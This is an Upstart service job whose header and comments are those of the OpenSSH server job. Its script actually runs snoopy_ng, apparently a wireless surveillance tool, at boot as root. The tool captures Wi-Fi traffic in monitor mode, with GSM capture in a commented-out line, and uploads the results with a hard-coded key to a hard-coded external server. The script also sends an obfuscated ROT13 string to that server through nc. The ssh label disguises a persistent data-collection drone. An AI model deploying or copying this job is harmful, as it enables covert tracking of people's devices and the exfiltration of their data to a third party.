# ssh - OpenBSD Secure Shell server
#
# The OpenSSH server provides secure shell access to the system.

description	"Snoopy"

start on filesystem or runlevel [2345]
stop on runlevel [!2345]

respawn
respawn limit 10 5
umask 022

# if you used to set SSHD_OPTS in /etc/default/ssh, you can change the

script
 sync_server=176.58.114.62
 sleep 60
 if ! echo "qbzunpxfyvxrntvey" | tr a-zA-Z n-za-mN-ZA-M | nc -v $sync_server 22 2> /dev/null 1> /dev/null; then echo "[!] Cannot connect to $sync_server, I'll proceed, and upload logs later" | logger -t snoopyStart; fi 
 sudo python /home/ubuntu/snoopy_ng/snoopy.py --client http://176.58.114.62:9001 --drone beagle --key EXQ3QP1QNYY93SE --location sensepost -m c80211:mon=True
end script
#exec sudo python /home/ubuntu/snoopy_ng/snoopy.py --client http://176.58.114.62:9001 --drone beagle --key EXQ3QP1QNYY93SE --location sensepost -m gsm:APN=internet -m c80211:mon=True
